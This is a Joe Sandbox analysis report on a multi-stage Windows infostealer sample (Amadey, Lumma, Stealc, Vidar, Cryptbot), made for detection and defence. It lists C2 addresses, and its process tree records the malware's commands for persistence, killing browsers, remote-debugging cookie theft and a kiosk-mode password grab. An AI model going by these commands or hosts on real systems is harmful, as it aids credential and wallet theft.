Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560104
MD5:fc60fac3b512854df25f9a62a8982b5f
SHA1:55bdf77f2f4e613f2aaf0a3cc22fc2e68678ac7e
SHA256:1bf9d23d442e10a752d5ff0bac0fc06a679fe36f8c289ea9243f5c6d94bed687
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FC60FAC3B512854DF25F9A62A8982B5F)
    • skotes.exe (PID: 7704 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: FC60FAC3B512854DF25F9A62A8982B5F)
  • skotes.exe (PID: 7816 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: FC60FAC3B512854DF25F9A62A8982B5F)
  • skotes.exe (PID: 2800 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: FC60FAC3B512854DF25F9A62A8982B5F)
    • 159c892ab5.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe" MD5: A02A1CB540D8658F640DBA74A1ADA983)
      • firefox.exe (PID: 4420 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • firefox.exe (PID: 3176 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • firefox.exe (PID: 8076 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2264 -prefMapHandle 2252 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b3756fb-4aa1-46df-9da2-bcc6763b1cc6} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" 18d64e69710 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • firefox.exe (PID: 8008 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -parentBuildID 20230927232528 -prefsHandle 3536 -prefMapHandle 3496 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e1a0ebf-e3e0-4aec-9a10-549fec5c1c42} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" 18d76f36510 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • chrome.exe (PID: 4420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2484,i,13421121324074571996,40061508320262685,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 7b9f3f6834.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe" MD5: 77483DF5AA89C592975F97C5B06E3B90)
    • a78a39a396.exe (PID: 7920 cmdline: "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe" MD5: EFBCCEEFF7FBBE424508E4DE00AD3CCD)
      • chrome.exe (PID: 7636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 4180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2184,i,15586406889969502989,18205548253034486808,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=2184,i,15586406889969502989,18205548253034486808,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 7180 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCFCGIIEHIE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • DocumentsCFCGIIEHIE.exe (PID: 3960 cmdline: "C:\Users\user\DocumentsCFCGIIEHIE.exe" MD5: FC60FAC3B512854DF25F9A62A8982B5F)
    • aca7749dee.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe" MD5: 000F6A67464F429EE855358DDADB9F3D)
      • taskkill.exe (PID: 8164 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1004 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 2792 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6924 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6816 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 7276 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • 76dd304e1d.exe (PID: 4088 cmdline: "C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe" MD5: 2F1C8416CEF3B59A907932142D732C06)
  • 7b9f3f6834.exe (PID: 2896 cmdline: "C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe" MD5: 77483DF5AA89C592975F97C5B06E3B90)
    • chrome.exe (PID: 7292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 4364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1984,i,15563652493800643433,5868694598429771387,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8280 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • a78a39a396.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe" MD5: EFBCCEEFF7FBBE424508E4DE00AD3CCD)
  • aca7749dee.exe (PID: 3440 cmdline: "C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe" MD5: 000F6A67464F429EE855358DDADB9F3D)
    • taskkill.exe (PID: 7740 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 3756 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 3512 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 6736 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 1460 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 3740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • firefox.exe (PID: 4500 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 5040 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • firefox.exe (PID: 2564 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2212 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e81363d9-7002-41a3-97be-ba7e9e1c74cc} 5040 "\\.\pipe\gecko-crash-server-pipe.5040" 1e565770310 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • 76dd304e1d.exe (PID: 4000 cmdline: "C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe" MD5: 2F1C8416CEF3B59A907932142D732C06)
  • 7b9f3f6834.exe (PID: 8024 cmdline: "C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe" MD5: 77483DF5AA89C592975F97C5B06E3B90)
  • a78a39a396.exe (PID: 7640 cmdline: "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe" MD5: EFBCCEEFF7FBBE424508E4DE00AD3CCD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
{"C2 url": ["processhol.sbs", "peepburry828.sbs", "p3ar11fter.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs"], "Build id": "LOGS11--LiveTraffic"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_CryptbotYara detected CryptbotJoe Security
    dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.1773808493.0000000000E31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          0000000B.00000003.2845014489.0000000001A60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1719295113.0000000004E80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0000000B.00000003.2846812600.0000000001A61000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 35 entries
                  SourceRuleDescriptionAuthorStrings
                  0.2.file.exe.e30000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    1.2.skotes.exe.8e0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      2.2.skotes.exe.8e0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        54.2.DocumentsCFCGIIEHIE.exe.ee0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                          System Summary

                          barindex
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7b9f3f6834.exe
                          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe, ParentProcessId: 7920, ParentProcessName: a78a39a396.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 7636, ProcessName: chrome.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7b9f3f6834.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:32.280965+010020283713Unknown Traffic192.168.2.449820188.114.96.3443TCP
                          2024-11-21T12:10:34.258098+010020283713Unknown Traffic192.168.2.449827188.114.96.3443TCP
                          2024-11-21T12:10:36.631226+010020283713Unknown Traffic192.168.2.449833188.114.96.3443TCP
                          2024-11-21T12:10:38.901090+010020283713Unknown Traffic192.168.2.449839188.114.96.3443TCP
                          2024-11-21T12:10:41.810382+010020283713Unknown Traffic192.168.2.449847188.114.96.3443TCP
                          2024-11-21T12:10:44.757165+010020283713Unknown Traffic192.168.2.449855188.114.96.3443TCP
                          2024-11-21T12:10:47.527138+010020283713Unknown Traffic192.168.2.449863188.114.96.3443TCP
                          2024-11-21T12:10:48.131331+010020283713Unknown Traffic192.168.2.449866188.114.96.3443TCP
                          2024-11-21T12:10:50.130333+010020283713Unknown Traffic192.168.2.449874188.114.96.3443TCP
                          2024-11-21T12:10:53.864817+010020283713Unknown Traffic192.168.2.449895188.114.96.3443TCP
                          2024-11-21T12:10:54.762290+010020283713Unknown Traffic192.168.2.449904188.114.96.3443TCP
                          2024-11-21T12:10:56.709616+010020283713Unknown Traffic192.168.2.449912188.114.96.3443TCP
                          2024-11-21T12:10:59.680672+010020283713Unknown Traffic192.168.2.449924188.114.96.3443TCP
                          2024-11-21T12:11:04.475126+010020283713Unknown Traffic192.168.2.449942188.114.96.3443TCP
                          2024-11-21T12:11:07.600906+010020283713Unknown Traffic192.168.2.449954188.114.96.3443TCP
                          2024-11-21T12:11:11.336257+010020283713Unknown Traffic192.168.2.449970188.114.96.3443TCP
                          2024-11-21T12:11:21.163905+010020283713Unknown Traffic192.168.2.450015188.114.96.3443TCP
                          2024-11-21T12:11:24.041143+010020283713Unknown Traffic192.168.2.450025188.114.96.3443TCP
                          2024-11-21T12:11:29.094370+010020283713Unknown Traffic192.168.2.450046188.114.96.3443TCP
                          2024-11-21T12:11:32.578927+010020283713Unknown Traffic192.168.2.450057188.114.96.3443TCP
                          2024-11-21T12:11:38.958680+010020283713Unknown Traffic192.168.2.450087188.114.96.3443TCP
                          2024-11-21T12:11:40.547449+010020283713Unknown Traffic192.168.2.450100188.114.96.3443TCP
                          2024-11-21T12:11:41.273369+010020283713Unknown Traffic192.168.2.450108188.114.96.3443TCP
                          2024-11-21T12:11:43.089608+010020283713Unknown Traffic192.168.2.450121188.114.96.3443TCP
                          2024-11-21T12:11:44.341390+010020283713Unknown Traffic192.168.2.450128188.114.96.3443TCP
                          2024-11-21T12:11:46.453210+010020283713Unknown Traffic192.168.2.450136188.114.96.3443TCP
                          2024-11-21T12:11:49.397179+010020283713Unknown Traffic192.168.2.450147188.114.96.3443TCP
                          2024-11-21T12:11:51.709309+010020283713Unknown Traffic192.168.2.450154188.114.96.3443TCP
                          2024-11-21T12:11:53.892117+010020283713Unknown Traffic192.168.2.450162188.114.96.3443TCP
                          2024-11-21T12:11:56.180915+010020283713Unknown Traffic192.168.2.450167188.114.96.3443TCP
                          2024-11-21T12:11:59.221974+010020283713Unknown Traffic192.168.2.450178188.114.96.3443TCP
                          2024-11-21T12:12:01.528454+010020283713Unknown Traffic192.168.2.450185188.114.96.3443TCP
                          2024-11-21T12:12:41.799932+010020283713Unknown Traffic192.168.2.45024420.42.65.92443TCP
                          2024-11-21T12:13:51.039915+010020283713Unknown Traffic192.168.2.45028920.42.65.94443TCP
                          2024-11-21T12:17:35.598228+010020283713Unknown Traffic192.168.2.450373188.114.97.3443TCP
                          2024-11-21T12:17:37.747965+010020283713Unknown Traffic192.168.2.450375188.114.97.3443TCP
                          2024-11-21T12:17:40.061879+010020283713Unknown Traffic192.168.2.450377188.114.97.3443TCP
                          2024-11-21T12:17:42.377655+010020283713Unknown Traffic192.168.2.450380188.114.97.3443TCP
                          2024-11-21T12:17:44.614539+010020283713Unknown Traffic192.168.2.450382188.114.97.3443TCP
                          2024-11-21T12:17:46.885052+010020283713Unknown Traffic192.168.2.450383188.114.97.3443TCP
                          2024-11-21T12:17:49.610585+010020283713Unknown Traffic192.168.2.450386188.114.97.3443TCP
                          2024-11-21T12:17:50.126756+010020283713Unknown Traffic192.168.2.450387188.114.97.3443TCP
                          2024-11-21T12:17:52.209861+010020283713Unknown Traffic192.168.2.450390188.114.97.3443TCP
                          2024-11-21T12:17:52.804072+010020283713Unknown Traffic192.168.2.450392188.114.97.3443TCP
                          2024-11-21T12:17:54.493975+010020283713Unknown Traffic192.168.2.450395188.114.97.3443TCP
                          2024-11-21T12:17:56.671400+010020283713Unknown Traffic192.168.2.450398188.114.97.3443TCP
                          2024-11-21T12:17:58.938981+010020283713Unknown Traffic192.168.2.450400188.114.97.3443TCP
                          2024-11-21T12:18:01.386689+010020283713Unknown Traffic192.168.2.450402188.114.97.3443TCP
                          2024-11-21T12:18:03.976057+010020283713Unknown Traffic192.168.2.450404188.114.97.3443TCP
                          2024-11-21T12:18:07.570325+010020283713Unknown Traffic192.168.2.450413188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:32.979604+010020546531A Network Trojan was detected192.168.2.449820188.114.96.3443TCP
                          2024-11-21T12:10:34.974004+010020546531A Network Trojan was detected192.168.2.449827188.114.96.3443TCP
                          2024-11-21T12:10:48.352917+010020546531A Network Trojan was detected192.168.2.449863188.114.96.3443TCP
                          2024-11-21T12:10:50.928169+010020546531A Network Trojan was detected192.168.2.449874188.114.96.3443TCP
                          2024-11-21T12:11:12.057864+010020546531A Network Trojan was detected192.168.2.449970188.114.96.3443TCP
                          2024-11-21T12:11:21.860425+010020546531A Network Trojan was detected192.168.2.450015188.114.96.3443TCP
                          2024-11-21T12:11:24.758058+010020546531A Network Trojan was detected192.168.2.450025188.114.96.3443TCP
                          2024-11-21T12:11:41.234114+010020546531A Network Trojan was detected192.168.2.450100188.114.96.3443TCP
                          2024-11-21T12:11:43.799421+010020546531A Network Trojan was detected192.168.2.450121188.114.96.3443TCP
                          2024-11-21T12:11:47.222802+010020546531A Network Trojan was detected192.168.2.450136188.114.96.3443TCP
                          2024-11-21T12:12:02.246800+010020546531A Network Trojan was detected192.168.2.450185188.114.96.3443TCP
                          2024-11-21T12:17:36.303833+010020546531A Network Trojan was detected192.168.2.450373188.114.97.3443TCP
                          2024-11-21T12:17:38.455610+010020546531A Network Trojan was detected192.168.2.450375188.114.97.3443TCP
                          2024-11-21T12:17:50.876881+010020546531A Network Trojan was detected192.168.2.450387188.114.97.3443TCP
                          2024-11-21T12:17:53.043455+010020546531A Network Trojan was detected192.168.2.450390188.114.97.3443TCP
                          2024-11-21T12:17:53.507804+010020546531A Network Trojan was detected192.168.2.450392188.114.97.3443TCP
                          2024-11-21T12:18:08.312997+010020546531A Network Trojan was detected192.168.2.450413188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:32.979604+010020498361A Network Trojan was detected192.168.2.449820188.114.96.3443TCP
                          2024-11-21T12:10:48.352917+010020498361A Network Trojan was detected192.168.2.449863188.114.96.3443TCP
                          2024-11-21T12:11:21.860425+010020498361A Network Trojan was detected192.168.2.450015188.114.96.3443TCP
                          2024-11-21T12:11:41.234114+010020498361A Network Trojan was detected192.168.2.450100188.114.96.3443TCP
                          2024-11-21T12:17:36.303833+010020498361A Network Trojan was detected192.168.2.450373188.114.97.3443TCP
                          2024-11-21T12:17:50.876881+010020498361A Network Trojan was detected192.168.2.450387188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:34.974004+010020498121A Network Trojan was detected192.168.2.449827188.114.96.3443TCP
                          2024-11-21T12:10:50.928169+010020498121A Network Trojan was detected192.168.2.449874188.114.96.3443TCP
                          2024-11-21T12:11:24.758058+010020498121A Network Trojan was detected192.168.2.450025188.114.96.3443TCP
                          2024-11-21T12:11:43.799421+010020498121A Network Trojan was detected192.168.2.450121188.114.96.3443TCP
                          2024-11-21T12:17:38.455610+010020498121A Network Trojan was detected192.168.2.450375188.114.97.3443TCP
